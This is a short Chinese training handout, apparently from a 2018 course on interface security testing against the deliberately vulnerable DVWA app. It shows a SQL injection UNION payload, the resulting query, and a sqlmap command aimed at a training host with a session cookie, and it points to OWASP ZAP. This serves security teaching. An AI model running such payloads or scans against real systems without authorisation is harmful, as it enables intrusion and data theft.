线上第六期_接口安全测试_20181014

课前准备

DVWA

命令注入

Sql注入

a' UNION SELECT "text1","text2";-- -
SELECT first_name, last_name FROM users WHERE user_id = '$id';
SELECT first_name, last_name FROM users WHERE user_id = 'a' UNION SELECT "text1","text2";-- -';

sqlmap自动扫描

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py -h
python sqlmap.py -u 'http://jenkins.testing-studio.com:8082/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie="PHPSESSID=j06g4qtdrddoou7ovf4sem5dt3; security=low" --dbms=mysql --level=5 --batch

OWASP ZAP扫描工具

下载地址: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project


发现的漏洞示例

演练

http://jenkins.testing-studio.com:8082/login.php
演练下基本的安全漏洞,体验下常见的安全漏洞和攻击的方式

关闭